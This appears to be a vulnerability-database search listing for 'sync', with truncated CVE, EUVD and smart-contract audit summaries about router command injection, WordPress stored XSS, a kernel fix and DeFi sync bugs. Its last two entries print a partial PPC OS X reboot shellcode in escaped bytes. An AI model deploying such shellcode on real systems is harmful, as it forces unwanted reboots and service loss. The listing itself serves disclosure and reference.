CVE-2026-7721
A security vulnerability has been detected in Totolink WA300 5.2cu.7112B20190227. This affects the function NTPSyncWithHost of the file /cgi-bin/cstecgi.cgi. Such manipulation of the argument hostTime leads to command injection. The attack can be executed remotely. The exploit has been disclosed...
CVE-2025-11727
The Omnichannel for WooCommerce: Google, Amazon, eBay & Walmart Integration – Powered by Codisto plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the sync function in all versions up to, and including, 1.3.65 due to insufficient input sanitization and output escaping. This...
CVE-2025-11727
CVE-2025-11727 concerns Omnichannel for WooCommerce: Google, Amazon, eBay & Walmart Integration – Powered by Codisto for WordPress. The WordPress plugin is susceptible to Stored Cross-Site Scripting via the sync() function in all versions up to 1.3.65, caused by insufficient input sanitization an...
EUVD-2025-201140
The Omnichannel for WooCommerce: Google, Amazon, eBay & Walmart Integration – Powered by Codisto plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the sync function in all versions up to, and including, 1.3.65 due to insufficient input sanitization and output escaping. This...
CVE-2025-11727 Omnichannel for WooCommerce: Google, Amazon, eBay & Walmart Integration - Powered by Codisto <= 1.3.65 - Unauthenticated Stored Cross-Site Scripting
The Omnichannel for WooCommerce: Google, Amazon, eBay & Walmart Integration – Powered by Codisto plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the sync function in all versions up to, and including, 1.3.65 due to insufficient input sanitization and output escaping. This...
CVE-2022-49282
In the Linux kernel, the following vulnerability has been resolved: f2fs: quota: fix loop condition at f2fs_quota_sync(). cnt should be passed to sb_has_quota_active() instead of type to check active quota properly. Moreover, when the type is -1, the compiler with enough inline knowledge can discard...
PT-2024-4058 · Totolink · Totolink Lr350
Name of the Vulnerable Software and Affected Versions: TOTOLINK LR350 version V9.3.5u.6369 B20220309 Description: The issue is related to the NTPSyncWithHost function in the TOTOLINK LR350 router's firmware, which lacks input validation. This can be exploited by a remote attacker to execute...
Upgraded Q -> 2 from #1784 [1698218728214]
Judge has assessed an item in Issue 1784 as 2 risk. The relevant finding follows: Low -2 UniV2LiquidityAmo.sol accounting might be temporarily out of sync In UniV2LiquidityAmo.sol, sync is an external function that can be called by anyone to update the lpTokenBalance. And lpTokenBalance is modifi...
The Rdpx V2 Core contract functionality blocking
Lines of code Vulnerability details Impact The RdpxV2Core contract functionality can be blocked as long as the contract WETH balance is less than totalWethDelegated. This can happen even without malicious activities. Proof of Concept The sync function of the RdpxV2Core contract has a special...
Attacker can DOS the sync function of RdpxV2Core which will brick critical functionality
Lines of code Vulnerability details Impact The sync function of the RdpxV2Core contract is critical for ensuring that the cached balances of the tokens in the contract are up to date. For example, all of the AMO logic involves sending tokens directly to the RdpxV2Core contract, meaning there's no...
Funds added to reserves through sync are accidentally transferred out to users
Lines of code Vulnerability details Impact Wells have the ability to shift funds to other Wells as part of gas-efficient multi-pool swaps. The natspec explanation of this can be found here. The sync function is intended to synchronize the underlying token amounts with the token reserves of the...
Router: Transferring Token to the Pair contract will cause future liquidity providers to lose funds
Lines of code Vulnerability details Impact Same as code-423n4/2022-01-elasticswap-findings146 In the current implementation, the amount of LP tokens to be minted when addLiquidity is calculated based on the ratio between the amount of newly added tokens and the reserve variable in the Pair...
The design of wibBTC is not fully compatible with the current Curve StableSwap pool
Handle WatchPug Vulnerability details Per the documentation, wibBTC is designed for a Curve StableSwap pool. However, the design of wibBTC makes the balances change dynamically and automatically. This is unusual for an ERC20 token, and it's not fully compatible with the current Curve StableSwap...
os-x/PPC reboot 28 bytes
Exploit for os-x/ppc platform in category shellcode ======================== os-x/PPC reboot 28 bytes ======================== / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does sync reboot; See ASM below. 28 Bytes. / char shellcode = "\x7c\x63\x1a\x79" "\x39\x40\x01\x70" "\x38\x0a\xfe\xb4"...
os-x/PPC reboot 28 bytes
No description provided by source. / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does sync reboot; See ASM below. 28 Bytes. / char shellcode = "\x7c\x63\x1a\x79" "\x39\x40\x01\x70" "\x38\x0a\xfe\xb4" "\x44\xff\xff\x02" "\x60\x60\x60\x60" "\x38\x0a\xfe\xc7" "\x44\xff\xff\x02"; int main void asm"b...